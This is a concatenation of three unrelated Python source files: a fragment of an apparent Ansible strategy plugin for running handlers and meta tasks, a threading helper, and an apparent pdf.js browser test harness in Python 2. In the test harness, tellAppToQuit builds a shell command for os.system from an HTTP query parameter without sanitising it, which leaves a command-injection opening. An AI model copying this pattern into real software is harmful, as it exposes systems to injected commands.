for (entry, role_obj) in iteritems(iterator._play.ROLE_CACHE[original_task._role._role_name]):
if role_obj._uuid == original_task._role._uuid:
role_obj._had_task_run[original_host.name] = True
ret_results.append(task_result)
if one_pass or max_passes is not None and (cur_pass + 1) >= max_passes:
break
cur_pass += 1
return ret_results
def _wait_on_pending_results(self, iterator):
'''
Wait for the shared counter to drop to zero, using a short sleep
between checks to ensure we don't spin lock
'''
ret_results = []
display.debug("waiting for pending results...")
while self._pending_results > 0 and not self._tqm._terminated:
if self._tqm.has_dead_workers():
raise AnsibleError("A worker was found in a dead state")
results = self._process_pending_results(iterator)
ret_results.extend(results)
if self._pending_results > 0:
time.sleep(C.DEFAULT_INTERNAL_POLL_INTERVAL)
display.debug("no more pending results, returning what we have")
return ret_results
def _add_host(self, host_info, iterator):
'''
Helper function to add a new host to inventory based on a task result.
'''
if host_info:
host_name = host_info.get('host_name')
# Check if host in inventory, add if not
if host_name not in self._inventory.hosts:
self._inventory.add_host(host_name, 'all')
new_host = self._inventory.hosts.get(host_name)
# Set/update the vars for this host
new_host.vars = combine_vars(new_host.get_vars(), host_info.get('host_vars', dict()))
new_groups = host_info.get('groups', [])
for group_name in new_groups:
if group_name not in self._inventory.groups:
self._inventory.add_group(group_name)
new_group = self._inventory.groups[group_name]
new_group.add_host(self._inventory.hosts[host_name])
# reconcile inventory, ensures inventory rules are followed
self._inventory.reconcile_inventory()
def _add_group(self, host, result_item):
'''
Helper function to add a group (if it does not exist), and to assign the
specified host to that group.
'''
changed = False
# the host here is from the executor side, which means it was a
# serialized/cloned copy and we'll need to look up the proper
# host object from the master inventory
real_host = self._inventory.hosts[host.name]
group_name = result_item.get('add_group')
parent_group_names = result_item.get('parent_groups', [])
for name in [group_name] + parent_group_names:
if name not in self._inventory.groups:
# create the new group and add it to inventory
self._inventory.add_group(name)
changed = True
group = self._inventory.groups[group_name]
for parent_group_name in parent_group_names:
parent_group = self._inventory.groups[parent_group_name]
parent_group.add_child_group(group)
if real_host.name not in group.get_hosts():
group.add_host(real_host)
changed = True
if group_name not in host.get_groups():
real_host.add_group(group)
changed = True
if changed:
self._inventory.reconcile_inventory()
return changed
def _load_included_file(self, included_file, iterator, is_handler=False):
'''
Loads an included YAML file of tasks, applying the optional set of variables.
'''
display.debug("loading included file: %s" % included_file._filename)
try:
data = self._loader.load_from_file(included_file._filename)
if data is None:
return []
elif not isinstance(data, list):
raise AnsibleError("included task files must contain a list of tasks")
ti_copy = included_file._task.copy()
temp_vars = ti_copy.vars.copy()
temp_vars.update(included_file._args)
# pop tags out of the include args, if they were specified there, and assign
# them to the include. If the include already had tags specified, we raise an
# error so that users know not to specify them both ways
tags = included_file._task.vars.pop('tags', [])
if isinstance(tags, string_types):
tags = tags.split(',')
if len(tags) > 0:
if len(included_file._task.tags) > 0:
raise AnsibleParserError("Include tasks should not specify tags in more than one way (both via args and directly on the task). "
"Mixing tag specify styles is prohibited for whole import hierarchy, not only for single import statement",
obj=included_file._task._ds)
display.deprecated("You should not specify tags in the include parameters. All tags should be specified using the task-level option")
included_file._task.tags = tags
ti_copy.vars = temp_vars
block_list = load_list_of_blocks(
data,
play=iterator._play,
parent_block=None,
task_include=ti_copy,
role=included_file._task._role,
use_handlers=is_handler,
loader=self._loader,
variable_manager=self._variable_manager,
)
# since we skip incrementing the stats when the task result is
# first processed, we do so now for each host in the list
for host in included_file._hosts:
self._tqm._stats.increment('ok', host.name)
except AnsibleError as e:
# mark all of the hosts including this file as failed, send callbacks,
# and increment the stats for this host
for host in included_file._hosts:
tr = TaskResult(host=host, task=included_file._task, return_data=dict(failed=True, reason=to_text(e)))
iterator.mark_host_failed(host)
self._tqm._failed_hosts[host.name] = True
self._tqm._stats.increment('failures', host.name)
self._tqm.send_callback('v2_runner_on_failed', tr)
return []
# finally, send the callback and return the list of blocks loaded
self._tqm.send_callback('v2_playbook_on_include', included_file)
display.debug("done processing included file")
return block_list
def run_handlers(self, iterator, play_context):
'''
Runs handlers on those hosts which have been notified.
'''
result = self._tqm.RUN_OK
for handler_block in iterator._play.handlers:
# FIXME: handlers need to support the rescue/always portions of blocks too,
# but this may take some work in the iterator and gets tricky when
# we consider the ability of meta tasks to flush handlers
for handler in handler_block.block:
if handler._uuid in self._notified_handlers and len(self._notified_handlers[handler._uuid]):
result = self._do_handler_run(handler, handler.get_name(), iterator=iterator, play_context=play_context)
if not result:
break
return result
def _do_handler_run(self, handler, handler_name, iterator, play_context, notified_hosts=None):
# FIXME: need to use iterator.get_failed_hosts() instead?
# if not len(self.get_hosts_remaining(iterator._play)):
# self._tqm.send_callback('v2_playbook_on_no_hosts_remaining')
# result = False
# break
saved_name = handler.name
handler.name = handler_name
self._tqm.send_callback('v2_playbook_on_handler_task_start', handler)
handler.name = saved_name
if notified_hosts is None:
notified_hosts = self._notified_handlers[handler._uuid]
run_once = False
try:
action = action_loader.get(handler.action, class_only=True)
if handler.run_once or getattr(action, 'BYPASS_HOST_LOOP', False):
run_once = True
except KeyError:
# we don't care here, because the action may simply not have a
# corresponding action plugin
pass
host_results = []
for host in notified_hosts:
if not handler.has_triggered(host) and (not iterator.is_failed(host) or play_context.force_handlers):
if handler._uuid not in iterator._task_uuid_cache:
iterator._task_uuid_cache[handler._uuid] = handler
task_vars = self._variable_manager.get_vars(play=iterator._play, host=host, task=handler)
self.add_tqm_variables(task_vars, play=iterator._play)
self._queue_task(host, handler, task_vars, play_context)
if run_once:
break
# collect the results from the handler run
host_results = self._wait_on_pending_results(iterator)
try:
included_files = IncludedFile.process_include_results(
host_results,
self._tqm,
iterator=iterator,
inventory=self._inventory,
loader=self._loader,
variable_manager=self._variable_manager
)
except AnsibleError as e:
return False
result = True
if len(included_files) > 0:
for included_file in included_files:
try:
new_blocks = self._load_included_file(included_file, iterator=iterator, is_handler=True)
# for every task in each block brought in by the include, add the list
# of hosts which included the file to the notified_handlers dict
for block in new_blocks:
iterator._play.handlers.append(block)
iterator.cache_block_tasks(block)
for task in block.block:
result = self._do_handler_run(
handler=task,
handler_name=None,
iterator=iterator,
play_context=play_context,
notified_hosts=included_file._hosts[:],
)
if not result:
break
except AnsibleError as e:
for host in included_file._hosts:
iterator.mark_host_failed(host)
self._tqm._failed_hosts[host.name] = True
display.warning(str(e))
continue
# wipe the notification list
self._notified_handlers[handler._uuid] = []
display.debug("done running handlers, result is: %s" % result)
return result
def _take_step(self, task, host=None):
ret = False
msg = u'Perform task: %s ' % task
if host:
msg += u'on %s ' % host
msg += u'(N)o/(y)es/(c)ontinue: '
resp = display.prompt(msg)
if resp.lower() in ['y', 'yes']:
display.debug("User ran task")
ret = True
elif resp.lower() in ['c', 'continue']:
display.debug("User ran task and canceled step mode")
self._step = False
ret = True
else:
display.debug("User skipped task")
display.banner(msg)
return ret
def _execute_meta(self, task, play_context, iterator, target_host):
# meta tasks store their args in the _raw_params field of args,
# since they do not use k=v pairs, so get that
meta_action = task.args.get('_raw_params')
# FIXME(s):
# * raise an error or show a warning when a conditional is used
# on a meta task that doesn't support them
def _evaluate_conditional(h):
all_vars = self._variable_manager.get_vars(play=iterator._play, host=h, task=task)
templar = Templar(loader=self._loader, variables=all_vars)
return task.evaluate_conditional(templar, all_vars)
skipped = False
msg = ''
if meta_action == 'noop':
# FIXME: issue a callback for the noop here?
msg = "noop"
elif meta_action == 'flush_handlers':
self.run_handlers(iterator, play_context)
msg = "ran handlers"
elif meta_action == 'refresh_inventory':
self._inventory.refresh_inventory()
msg = "inventory successfully refreshed"
elif meta_action == 'clear_facts':
if _evaluate_conditional(target_host):
for host in self._inventory.get_hosts(iterator._play.hosts):
hostname = host.get_name()
self._variable_manager.clear_facts(hostname)
msg = "facts cleared"
else:
skipped = True
elif meta_action == 'clear_host_errors':
if _evaluate_conditional(target_host):
for host in self._inventory.get_hosts(iterator._play.hosts):
self._tqm._failed_hosts.pop(host.name, False)
self._tqm._unreachable_hosts.pop(host.name, False)
iterator._host_states[host.name].fail_state = iterator.FAILED_NONE
msg = "cleared host errors"
else:
skipped = True
elif meta_action == 'end_play':
if _evaluate_conditional(target_host):
for host in self._inventory.get_hosts(iterator._play.hosts):
if host.name not in self._tqm._unreachable_hosts:
iterator._host_states[host.name].run_state = iterator.ITERATING_COMPLETE
msg = "ending play"
elif meta_action == 'reset_connection':
connection = connection_loader.get(play_context.connection, play_context, os.devnull)
play_context.set_options_from_plugin(connection)
if connection:
connection.reset()
msg = 'reset connection'
else:
msg = 'no connection, nothing to reset'
else:
raise AnsibleError("invalid meta action requested: %s" % meta_action, obj=task._ds)
result = {'msg': msg}
if skipped:
result['skipped'] = True
else:
result['changed'] = False
display.vv("META: %s" % msg)
return [TaskResult(target_host, task, result)]
def get_hosts_left(self, iterator):
''' returns list of available hosts for this iterator by filtering out unreachables '''
hosts_left = []
for host in self._inventory.get_hosts(iterator._play.hosts, order=iterator._play.order):
if host.name not in self._tqm._unreachable_hosts:
hosts_left.append(host)
return hosts_left
|
utils.py
|
import threading
def create_thread(obj):
obj_thread = threading.Thread(target=obj.run, daemon=True)
obj_thread.start()
    while obj_thread.is_alive():
obj_thread.join(1)
obj_response = obj.get_response()
return obj_response
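# Usage sketch (illustrative only, not part of the original module): create_thread()
# expects an object that exposes run() and get_response(). The hypothetical worker
# below shows the assumed interface.
if __name__ == "__main__":
    class ExampleWorker(object):
        def __init__(self):
            self._response = None
        def run(self):
            # do the actual work here, then record the result for the caller
            self._response = "done"
        def get_response(self):
            return self._response
    # blocks until run() finishes, then prints "done"
    print(create_thread(ExampleWorker()))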
|
test.py
|
# Copyright 2012 Mozilla Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json, platform, os, shutil, sys, subprocess, tempfile, threading
import time, urllib, urllib2, hashlib, re, base64, uuid, socket, errno
import traceback
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from SocketServer import ThreadingMixIn
from optparse import OptionParser
from urlparse import urlparse, parse_qs
from threading import Lock
USAGE_EXAMPLE = "%prog"
# The local web server uses the git repo as the document root.
DOC_ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__),".."))
GIT_CLONE_CHECK = True
DEFAULT_MANIFEST_FILE = 'test_manifest.json'
EQLOG_FILE = 'eq.log'
BROWSERLOG_FILE = 'browser.log'
REFDIR = 'ref'
TEST_SNAPSHOTS = 'test_snapshots'
TMPDIR = 'tmp'
VERBOSE = False
BROWSER_TIMEOUT = 120
SERVER_HOST = "localhost"
lock = Lock()
class TestOptions(OptionParser):
def __init__(self, **kwargs):
OptionParser.__init__(self, **kwargs)
self.add_option("-m", "--masterMode", action="store_true", dest="masterMode",
help="Run the script in master mode.", default=False)
self.add_option("--noPrompts", action="store_true", dest="noPrompts",
help="Uses default answers (intended for CLOUD TESTS only!).", default=False)
self.add_option("--manifestFile", action="store", type="string", dest="manifestFile",
help="A JSON file in the form of test_manifest.json (the default).")
self.add_option("-b", "--browser", action="store", type="string", dest="browser",
help="The path to a single browser (right now, only Firefox is supported).")
self.add_option("--browserManifestFile", action="store", type="string",
dest="browserManifestFile",
help="A JSON file in the form of those found in resources/browser_manifests")
self.add_option("--reftest", action="store_true", dest="reftest",
help="Automatically start reftest showing comparison test failures, if there are any.",
default=False)
self.add_option("--port", action="store", dest="port", type="int",
help="The port the HTTP server should listen on.", default=8080)
self.add_option("--unitTest", action="store_true", dest="unitTest",
help="Run the unit tests.", default=False)
self.add_option("--fontTest", action="store_true", dest="fontTest",
help="Run the font tests.", default=False)
self.add_option("--noDownload", action="store_true", dest="noDownload",
help="Skips test PDFs downloading.", default=False)
self.add_option("--statsFile", action="store", dest="statsFile", type="string",
help="The file where to store stats.", default=None)
self.add_option("--statsDelay", action="store", dest="statsDelay", type="int",
help="The amount of time in milliseconds the browser should wait before starting stats.", default=10000)
self.set_usage(USAGE_EXAMPLE)
def verifyOptions(self, options):
if options.reftest and (options.unitTest or options.fontTest):
self.error("--reftest and --unitTest/--fontTest must not be specified at the same time.")
if options.masterMode and options.manifestFile:
self.error("--masterMode and --manifestFile must not be specified at the same time.")
if not options.manifestFile:
options.manifestFile = DEFAULT_MANIFEST_FILE
if options.browser and options.browserManifestFile:
print "Warning: ignoring browser argument since manifest file was also supplied"
if not options.browser and not options.browserManifestFile:
print "Starting server on port %s." % options.port
if not options.statsFile:
options.statsDelay = 0
return options
def prompt(question):
'''Return True iff the user answered "yes" to |question|.'''
inp = raw_input(question +' [yes/no] > ')
return inp == 'yes'
MIMEs = {
'.css': 'text/css',
'.html': 'text/html',
'.js': 'application/javascript',
'.json': 'application/json',
'.svg': 'image/svg+xml',
'.pdf': 'application/pdf',
'.xhtml': 'application/xhtml+xml',
'.gif': 'image/gif',
'.ico': 'image/x-icon',
'.png': 'image/png',
'.log': 'text/plain',
'.properties': 'text/plain'
}
class State:
browsers = [ ]
manifest = { }
taskResults = { }
remaining = { }
results = { }
done = False
numErrors = 0
numEqFailures = 0
numEqNoSnapshot = 0
numFBFFailures = 0
numLoadFailures = 0
eqLog = None
saveStats = False
stats = [ ]
lastPost = { }
class UnitTestState:
browsers = [ ]
browsersRunning = 0
lastPost = { }
numErrors = 0
numRun = 0
class Result:
def __init__(self, snapshot, failure, page):
self.snapshot = snapshot
self.failure = failure
self.page = page
class TestServer(ThreadingMixIn, HTTPServer):
pass
class TestHandlerBase(BaseHTTPRequestHandler):
# Disable annoying noise by default
    def log_request(self, code='-', size='-'):
        if VERBOSE:
            BaseHTTPRequestHandler.log_request(self, code, size)
def handle_one_request(self):
try:
BaseHTTPRequestHandler.handle_one_request(self)
except socket.error, v:
if v[0] == errno.ECONNRESET:
# Ignoring connection reset by peer exceptions
if VERBOSE:
print 'Detected connection reset'
elif v[0] == errno.EPIPE:
if VERBOSE:
print 'Detected remote peer disconnected'
elif v[0] == 10053:
if VERBOSE:
print 'An established connection was aborted by the' \
' software in your host machine'
else:
raise
def finish(self,*args,**kw):
# From http://stackoverflow.com/a/14355079/1834797
try:
if not self.wfile.closed:
self.wfile.flush()
self.wfile.close()
except socket.error:
pass
self.rfile.close()
def sendFile(self, path, ext):
self.send_response(200)
self.send_header("Accept-Ranges", "bytes")
self.send_header("Content-Type", MIMEs[ext])
self.send_header("Content-Length", os.path.getsize(path))
self.end_headers()
with open(path, "rb") as f:
self.wfile.write(f.read())
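    # sendFileRange serves HTTP 206 partial content. Example (illustrative): a request
    # with 'Range: bytes=100-199' on a 1000-byte file is parsed in do_GET into start=100,
    # end=200, so chunk_len=100 and the response carries 'Content-Range: bytes 100-199/1000'.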
def sendFileRange(self, path, ext, start, end):
file_len = os.path.getsize(path)
if (end is None) or (file_len < end):
end = file_len
if (file_len < start) or (end <= start):
self.send_error(416)
return
chunk_len = end - start
time.sleep(chunk_len / 1000000.0)
self.send_response(206)
self.send_header("Accept-Ranges", "bytes")
self.send_header("Content-Type", MIMEs[ext])
self.send_header("Content-Length", chunk_len)
self.send_header("Content-Range", 'bytes ' + str(start) + '-' + str(end - 1) + '/' + str(file_len))
self.end_headers()
with open(path, "rb") as f:
f.seek(start)
self.wfile.write(f.read(chunk_len))
def do_GET(self):
url = urlparse(self.path)
# Ignore query string
path, _ = urllib.unquote_plus(url.path), url.query
path = os.path.abspath(os.path.realpath(DOC_ROOT + os.sep + path))
prefix = os.path.commonprefix(( path, DOC_ROOT ))
_, ext = os.path.splitext(path.lower())
if url.path == "/favicon.ico":
self.sendFile(os.path.join(DOC_ROOT, "test", "resources", "favicon.ico"), ext)
return
if os.path.isdir(path):
self.sendIndex(url.path, url.query)
return
if not (prefix == DOC_ROOT
and os.path.isfile(path)
and ext in MIMEs):
print path
self.send_error(404)
return
if 'Range' in self.headers:
range_re = re.compile(r"^bytes=(\d+)\-(\d+)?")
parsed_range = range_re.search(self.headers.getheader("Range"))
if parsed_range is None:
self.send_error(501)
return
if VERBOSE:
                print 'Range requested %s - %s' % (
parsed_range.group(1), parsed_range.group(2))
start = int(parsed_range.group(1))
if parsed_range.group(2) is None:
self.sendFileRange(path, ext, start, None)
else:
end = int(parsed_range.group(2)) + 1
self.sendFileRange(path, ext, start, end)
return
self.sendFile(path, ext)
class UnitTestHandler(TestHandlerBase):
def sendIndex(self, path, query):
print "send index"
def translateFont(self, base64Data):
self.send_response(200)
self.send_header("Content-Type", "text/xml")
self.end_headers()
data = base64.b64decode(base64Data)
taskId = str(uuid.uuid4())
fontPath = 'ttx/' + taskId + '.otf'
resultPath = 'ttx/' + taskId + '.ttx'
with open(fontPath, "wb") as f:
f.write(data)
        # When fontTools is used directly, we need to sniff the ttx file
        # to check which version of python is used
ttxPath = ''
for path in os.environ["PATH"].split(os.pathsep):
if os.path.isfile(path + os.sep + "ttx"):
ttxPath = path + os.sep + "ttx"
break
if ttxPath == '':
self.wfile.write("<error>TTX was not found</error>")
return
ttxRunner = ''
with open(ttxPath, "r") as f:
firstLine = f.readline()
if firstLine[:2] == '#!' and firstLine.find('python') > -1:
ttxRunner = firstLine[2:].strip()
with open(os.devnull, "w") as fnull:
if ttxRunner != '':
result = subprocess.call([ttxRunner, ttxPath, fontPath], stdout = fnull)
else:
result = subprocess.call([ttxPath, fontPath], stdout = fnull)
os.remove(fontPath)
if not os.path.isfile(resultPath):
self.wfile.write("<error>Output was not generated</error>")
return
with open(resultPath, "rb") as f:
self.wfile.write(f.read())
os.remove(resultPath)
return
def do_POST(self):
with lock:
url = urlparse(self.path)
numBytes = int(self.headers['Content-Length'])
content = self.rfile.read(numBytes)
# Process special utility requests
if url.path == '/ttx':
self.translateFont(content)
return
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.end_headers()
result = json.loads(content)
browser = result['browser']
UnitTestState.lastPost[browser] = int(time.time())
if url.path == "/tellMeToQuit":
tellAppToQuit(url.path, url.query)
UnitTestState.browsersRunning -= 1
UnitTestState.lastPost[browser] = None
return
elif url.path == '/info':
print result['message']
elif url.path == '/submit_task_results':
status, description = result['status'], result['description']
UnitTestState.numRun += 1
if status == 'TEST-UNEXPECTED-FAIL':
UnitTestState.numErrors += 1
message = status + ' | ' + description + ' | in ' + browser
if 'error' in result:
message += ' | ' + result['error']
print message
else:
                print 'Error: unknown action ' + url.path
class PDFTestHandler(TestHandlerBase):
def sendIndex(self, path, query):
if not path.endswith("/"):
            # we need a trailing slash
self.send_response(301)
redirectLocation = path + "/"
if query:
redirectLocation += "?" + query
self.send_header("Location", redirectLocation)
self.end_headers()
return
self.send_response(200)
self.send_header("Content-Type", "text/html")
self.end_headers()
if query == "frame":
self.wfile.write("<html><frameset cols=*,200><frame name=pdf>" +
"<frame src='" + path + "'></frameset></html>")
return
location = os.path.abspath(os.path.realpath(DOC_ROOT + os.sep + path))
self.wfile.write("<html><body><h1>PDFs of " + path + "</h1>\n")
for filename in os.listdir(location):
if filename.lower().endswith('.pdf'):
self.wfile.write("<a href='/web/viewer.html?file=" +
urllib.quote_plus(path + filename, '/') + "' target=pdf>" +
filename + "</a><br>\n")
self.wfile.write("</body></html>")
def do_POST(self):
with lock:
numBytes = int(self.headers['Content-Length'])
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.end_headers()
url = urlparse(self.path)
if url.path == "/tellMeToQuit":
tellAppToQuit(url.path, url.query)
return
result = json.loads(self.rfile.read(numBytes))
browser = result['browser']
State.lastPost[browser] = int(time.time())
if url.path == "/info":
print result['message']
return
id = result['id']
failure = result['failure']
round = result['round']
page = result['page']
snapshot = result['snapshot']
taskResults = State.taskResults[browser][id]
taskResults[round].append(Result(snapshot, failure, page))
if State.saveStats:
stat = {
'browser': browser,
'pdf': id,
'page': page,
'round': round,
'stats': result['stats']
}
State.stats.append(stat)
def isTaskDone():
last_page_num = result['lastPageNum']
rounds = State.manifest[id]['rounds']
for round in range(0,rounds):
if not taskResults[round]:
return False
latest_page = taskResults[round][-1]
if not latest_page.page == last_page_num:
return False
return True
if isTaskDone():
# sort the results since they sometimes come in out of order
for results in taskResults:
results.sort(key=lambda result: result.page)
check(State.manifest[id], taskResults, browser,
self.server.masterMode)
# Please oh please GC this ...
del State.taskResults[browser][id]
State.remaining[browser] -= 1
checkIfDone()
def checkIfDone():
State.done = True
for key in State.remaining:
if State.remaining[key] != 0:
State.done = False
return
# Applescript hack to quit Chrome on Mac
def tellAppToQuit(path, query):
if platform.system() != "Darwin":
return
d = parse_qs(query)
path = d['path'][0]
cmd = """osascript<<END
tell application "%s"
quit
end tell
END""" % path
os.system(cmd)
class BaseBrowserCommand(object):
def __init__(self, browserRecord):
self.name = browserRecord["name"]
self.path = browserRecord["path"]
self.tempDir = None
self.process = None
if platform.system() == "Darwin" and (self.path.endswith(".app") or self.path.endswith(".app/")):
self._fixupMacPath()
if not os.path.exists(self.path):
raise Exception("Path to browser '%s' does not exist." % self.path)
def setup(self):
self.tempDir = tempfile.mkdtemp()
self.profileDir = os.path.join(self.tempDir, "profile")
self.browserLog = open(BROWSERLOG_FILE, "w")
def teardown(self):
        if self.process:
            self.process.terminate()
# If the browser is still running, wait up to ten seconds for it to quit
if self.process and self.process.poll() is None:
checks = 0
while self.process.poll() is None and checks < 20:
checks += 1
time.sleep(.5)
# If it's still not dead, try to kill it
if self.process.poll() is None:
print "Process %s is still running. Killing." % self.name
self.process.kill()
self.process.wait()
if self.tempDir is not None and os.path.exists(self.tempDir):
shutil.rmtree(self.tempDir)
self.browserLog.close()
def start(self, url):
raise Exception("Can't start BaseBrowserCommand")
class FirefoxBrowserCommand(BaseBrowserCommand):
def _fixupMacPath(self):
self.path = os.path.join(self.path, "Contents", "MacOS", "firefox-bin")
def setup(self):
super(FirefoxBrowserCommand, self).setup()
shutil.copytree(os.path.join(DOC_ROOT, "test", "resources", "firefox"),
self.profileDir)
def start(self, url):
cmds = [self.path]
if platform.system() == "Darwin":
cmds.append("-foreground")
cmds.extend(["-no-remote", "-profile", self.profileDir, url])
self.process = subprocess.Popen(cmds, stdout = self.browserLog, stderr = self.browserLog)
class ChromeBrowserCommand(BaseBrowserCommand):
def _fixupMacPath(self):
self.path = os.path.join(self.path, "Contents", "MacOS", "Google Chrome")
def start(self, url):
cmds = [self.path]
cmds.extend(["--user-data-dir=%s" % self.profileDir,
"--no-first-run", "--disable-sync", url])
self.process = subprocess.Popen(cmds, stdout = self.browserLog, stderr = self.browserLog)
def makeBrowserCommand(browser):
path = browser["path"].lower()
name = browser["name"]
if name is not None:
name = name.lower()
types = {"firefox": FirefoxBrowserCommand,
"chrome": ChromeBrowserCommand }
command = None
for key in types.keys():
if (name and name.find(key) > -1) or path.find(key) > -1:
command = types[key](browser)
command.name = command.name or key
break
if command is None:
raise Exception("Unrecognized browser: %s" % browser)
return command
def makeBrowserCommands(browserManifestFile):
with open(browserManifestFile) as bmf:
browsers = [makeBrowserCommand(browser) for browser in json.load(bmf)]
return browsers
def downloadLinkedPDF(f):
linkFile = open(f +'.link')
link = linkFile.read()
linkFile.close()
sys.stdout.write('Downloading '+ link +' to '+ f +' ...')
sys.stdout.flush()
response = urllib2.urlopen(link)
with open(f, 'wb') as out:
out.write(response.read())
print 'done'
def downloadLinkedPDFs(manifestList):
for item in manifestList:
f, isLink = item['file'], item.get('link', False)
if isLink and not os.access(f, os.R_OK):
try:
downloadLinkedPDF(f)
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
print 'ERROR: Unable to download file "' + f + '".'
open(f, 'wb').close()
with open(f + '.error', 'w') as out:
out.write('\n'.join(traceback.format_exception(exc_type,
exc_value,
exc_traceback)))
def verifyPDFs(manifestList):
error = False
for item in manifestList:
f = item['file']
if os.path.isfile(f + '.error'):
print 'WARNING: File was not downloaded. See "' + f + '.error" file.'
error = True
elif os.access(f, os.R_OK):
fileMd5 = hashlib.md5(open(f, 'rb').read()).hexdigest()
if 'md5' not in item:
print 'WARNING: Missing md5 for file "' + f + '".',
print 'Hash for current file is "' + fileMd5 + '"'
error = True
continue
md5 = item['md5']
if fileMd5 != md5:
print 'WARNING: MD5 of file "' + f + '" does not match file.',
print 'Expected "' + md5 + '" computed "' + fileMd5 + '"'
error = True
continue
else:
print 'WARNING: Unable to open file for reading "' + f + '".'
error = True
return not error
def getTestBrowsers(options):
testBrowsers = []
if options.browserManifestFile:
testBrowsers = makeBrowserCommands(options.browserManifestFile)
elif options.browser:
testBrowsers = [makeBrowserCommand({"path":options.browser, "name":None})]
if options.browserManifestFile or options.browser:
assert len(testBrowsers) > 0
return testBrowsers
def setUp(options):
# Only serve files from a pdf.js clone
assert not GIT_CLONE_CHECK or os.path.isfile('../src/pdf.js') and os.path.isdir('../.git')
if options.masterMode and os.path.isdir(TMPDIR):
print 'Temporary snapshot dir tmp/ is still around.'
print 'tmp/ can be removed if it has nothing you need.'
if options.noPrompts or prompt('SHOULD THIS SCRIPT REMOVE tmp/? THINK CAREFULLY'):
subprocess.call(( 'rm', '-rf', 'tmp' ))
assert not os.path.isdir(TMPDIR)
testBrowsers = getTestBrowsers(options)
with open(options.manifestFile) as mf:
manifestList = json.load(mf)
if not options.noDownload:
downloadLinkedPDFs(manifestList)
if not verifyPDFs(manifestList):
print 'Unable to verify the checksum for the files that are used for testing.'
print 'Please re-download the files, or adjust the MD5 checksum in the manifest for the files listed above.\n'
for b in testBrowsers:
State.taskResults[b.name] = { }
State.remaining[b.name] = len(manifestList)
State.lastPost[b.name] = int(time.time())
for item in manifestList:
id, rounds = item['id'], int(item['rounds'])
State.manifest[id] = item
taskResults = [ ]
for r in xrange(rounds):
taskResults.append([ ])
State.taskResults[b.name][id] = taskResults
if options.statsFile != None:
State.saveStats = True
return testBrowsers
def setUpUnitTests(options):
# Only serve files from a pdf.js clone
assert not GIT_CLONE_CHECK or os.path.isfile('../src/pdf.js') and os.path.isdir('../.git')
testBrowsers = getTestBrowsers(options)
UnitTestState.browsersRunning = len(testBrowsers)
for b in testBrowsers:
UnitTestState.lastPost[b.name] = int(time.time())
return testBrowsers
def startBrowsers(browsers, options, path):
for b in browsers:
b.setup()
print 'Launching', b.name
host = 'http://%s:%s' % (SERVER_HOST, options.port)
qs = '?browser='+ urllib.quote(b.name) +'&manifestFile='+ urllib.quote(options.manifestFile)
qs += '&path=' + b.path
qs += '&delay=' + str(options.statsDelay)
qs += '&masterMode=' + str(options.masterMode)
b.start(host + path + qs)
def teardownBrowsers(browsers):
for b in browsers:
try:
b.teardown()
except:
print "Error cleaning up after browser at ", b.path
print "Temp dir was ", b.tempDir
print "Error:", sys.exc_info()[0]
def check(task, results, browser, masterMode):
failed = False
for r in xrange(len(results)):
pageResults = results[r]
for p in xrange(len(pageResults)):
pageResult = pageResults[p]
if pageResult is None:
continue
failure = pageResult.failure
if failure:
failed = True
if os.path.isfile(task['file'] + '.error'):
print 'TEST-SKIPPED | PDF was not downloaded', task['id'], '| in', browser, '| page', p + 1, 'round', r, '|', failure
else:
State.numErrors += 1
print 'TEST-UNEXPECTED-FAIL | test failed', task['id'], '| in', browser, '| page', p + 1, 'round', r, '|', failure
if failed:
return
kind = task['type']
if 'eq' == kind or 'text' == kind:
checkEq(task, results, browser, masterMode)
elif 'fbf' == kind:
checkFBF(task, results, browser)
elif 'load' == kind:
checkLoad(task, results, browser)
else:
        assert 0, 'Unknown test type'
def createDir(dir):
try:
os.makedirs(dir)
except OSError, e:
if e.errno != 17: # file exists
print >>sys.stderr, 'Creating', dir, 'failed!'
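# Snapshots arrive as data URIs (e.g. 'data:image/png;base64,<payload>'); strip the
# metadata prefix and return the decoded bytes.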
def readDataUri(data):
metadata, encoded = data.rsplit(",", 1)
return base64.b64decode(encoded)
def checkEq(task, results, browser, masterMode):
pfx = os.path.join(REFDIR, sys.platform, browser, task['id'])
testSnapshotDir = os.path.join(TEST_SNAPSHOTS, sys.platform, browser, task['id'])
results = results[0]
taskId = task['id']
taskType = task['type']
passed = True
for result in results:
page = result.page
snapshot = readDataUri(result.snapshot)
ref = None
eq = True
path = os.path.join(pfx, str(page) + '.png')
if not os.access(path, os.R_OK):
State.numEqNoSnapshot += 1
if not masterMode:
print 'WARNING: no reference snapshot', path
else:
f = open(path, 'rb')
ref = f.read()
f.close()
eq = (ref == snapshot)
if not eq:
print 'TEST-UNEXPECTED-FAIL |', taskType, taskId, '| in', browser, '| rendering of page', page, '!= reference rendering'
if not State.eqLog:
State.eqLog = open(EQLOG_FILE, 'w')
eqLog = State.eqLog
createDir(testSnapshotDir)
testSnapshotPath = os.path.join(testSnapshotDir, str(page) + '.png')
handle = open(testSnapshotPath, 'wb')
handle.write(snapshot)
handle.close()
refSnapshotPath = os.path.join(testSnapshotDir, str(page) + '_ref.png')
handle = open(refSnapshotPath, 'wb')
handle.write(ref)
handle.close()
# NB: this follows the format of Mozilla reftest
# output so that we can reuse its reftest-analyzer
# script
eqLog.write('REFTEST TEST-UNEXPECTED-FAIL | ' + browser +'-'+ taskId +'-page'+ str(page) + ' | image comparison (==)\n')
eqLog.write('REFTEST IMAGE 1 (TEST): ' + testSnapshotPath + '\n')
eqLog.write('REFTEST IMAGE 2 (REFERENCE): ' + refSnapshotPath + '\n')
passed = False
State.numEqFailures += 1
if masterMode and (ref is None or not eq):
tmpTaskDir = os.path.join(TMPDIR, sys.platform, browser, task['id'])
createDir(tmpTaskDir)
handle = open(os.path.join(tmpTaskDir, str(page)) + '.png', 'wb')
handle.write(snapshot)
handle.close()
if passed:
print 'TEST-PASS |', taskType, 'test', task['id'], '| in', browser
def checkFBF(task, results, browser):
round0, round1 = results[0], results[1]
assert len(round0) == len(round1)
passed = True
for page in xrange(len(round1)):
